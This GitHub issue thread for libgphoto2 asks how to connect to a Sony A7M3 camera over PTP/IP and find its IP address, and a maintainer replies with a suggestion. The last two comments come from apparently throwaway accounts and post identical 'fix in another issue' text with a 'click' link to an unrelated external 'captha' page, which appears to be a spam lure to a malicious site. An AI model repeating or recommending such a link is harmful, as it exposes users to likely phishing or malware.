gphoto/libgphoto2 #1090: PTPIP协议自动获取IP和手动设置IP地址示例疑问

ArvinSpace, 2025-02-13:
**Question**

你好，请问有没有PTPIP协议连接照相机的示例呢？
ptpip.c中通过DNS扫描自动获取IP地址不行，想手动设置IP地址但是我不知道照相机连接WIFI之后的ip地址是多少

**Name the camera**
Sony A7M3
不知道这个照相机是否支持PTPIP，照相机连接WIFI之后，在路由器的已连接设备中没有列出此照相机(通过对比照相机的MAC地址)

**libgphoto2 and gphoto2 version**
libgphoto2: 2.5.31

msmeissn, 2025-02-16:
If you operate the camera in your wifi, you will need to find out the IP , e.g. from the wifi router frontend.

It is possible the access point creates a local DNS entry based on the name the camera reports.

We currently have no good idea how to do discovery via zeroconf/mdns.

ArvinSpace, 2025-02-18:
不知道可不可以使用SSDP来扫描呢

DomesticFemBoy, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)

Domestos2281337, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)